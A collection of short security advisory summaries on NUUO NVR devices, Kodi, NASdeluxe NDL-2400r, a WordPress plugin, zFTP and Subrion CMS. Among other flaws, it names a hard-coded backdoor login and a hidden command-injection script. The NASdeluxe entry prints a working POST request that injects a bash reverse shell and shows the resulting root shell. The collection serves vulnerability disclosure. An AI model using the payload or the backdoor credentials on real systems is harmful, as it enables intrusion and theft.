NUUO NVRmini, NVRmini2, Crystal and NVRSolo devices have a hidden PHP script that, when called, creates a backdoor user with poweruser privileges that is able to read and write files on the affected device. The backdoor user 'bbb', created with the password '111111' by visiting the 'strong_user.php' script, is able to initiate a secure shell session and further steal and/or destroy sensitive information.
Input passed to the 'filename' parameter in 'deletefile.php' is not properly sanitised before being used to delete files. This can be exploited to delete files with the permissions of the web server using their absolute path or via directory traversal sequences passed within the affected POST/GET parameter.
NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffer from an authenticated ShellShock vulnerability. This could allow an attacker to gain control over a targeted computer if exploited successfully. The vulnerability affects Bash, a common component known as a shell that appears in many versions of Linux and Unix.
The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.
NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffer from an unauthenticated command injection vulnerability. Due to an undocumented and hidden debugging script, an attacker can inject and execute arbitrary code as the root user via the 'log' GET parameter in the '__debugging_center_utils___.php' script.
A remote denial-of-service vulnerability exists in the Kodi 16.1 (Jarvis) embedded web server when a specially crafted GET request is sent. The web server is disabled by default.
The product "NASdeluxe NDL-2400r" is vulnerable to OS Command Injection as root. No credentials are required to exploit this vulnerability. The language parameter in the web interface login request of the product "NASdeluxe NDL-2400r" is vulnerable to an OS Command Injection as root. The SySS GmbH sent the following HTTPS request to the web interface:

    POST /usr/usrgetform.html?name=index HTTP/1.1
    Host: 192.168.1.1
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 97

    lang=||`bash+-i+>%26+/dev/tcp/192.168.1.2/443+0>%261`&username=&pwd=&site=web_disk&login_btn=Einloggen

After sending the request, a reverse shell connected back:

    # nc -lvvp 443
    Listening on any address 443 (https)
    Connection from 192.168.1.1:49070
    bash: no job control in this shell
    bash-3.00# whoami
    root
    bash-3.00# cat /img/version
    2.01.09

The tested firmware version was 2.01.09. The most current version is 2.01.10 according to the web page of the vendor [3]. However, there are no hints of a security update in the release notes [4]. Thus, the SySS GmbH assumes that this vulnerability is likely also present in the most current firmware version from 2009-10-22.
A Cross-Site Scripting vulnerability was found in the Count per Day WordPress Plugin. This issue can be exploited by an unauthenticated attacker and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.
This exploit targets a local buffer overflow vulnerability in zFTP Client. It was developed using Exploit Pack v5.4 by Juan Sacco. The vulnerable code is located in Line 30 of strcpy_chk.c. The affected version is 20061220+dfsg3-4.1. The exploit was tested and developed under Kali Linux 2.0 x86. The Kali Linux 2.0 package is pool/main/c/cernlib/zftp_20061220+dfsg3-4.1_i386.deb with MD5sum 524217187d28e4444d6c437ddd37e4de. The exploit uses a NOP sled, shellcode and EIP to execute the attack.
A remote SQL injection web vulnerability has been discovered in the Subrion v4.0.5 content management system. The vulnerability allows remote attackers to execute their own malicious SQL commands to compromise the application or DBMS. The SQL injection vulnerability is located in the `query` and `show_query` parameters of the `.database/sql/` module POST method request. Remote attackers are able to execute their own SQL commands to compromise the application or DBMS.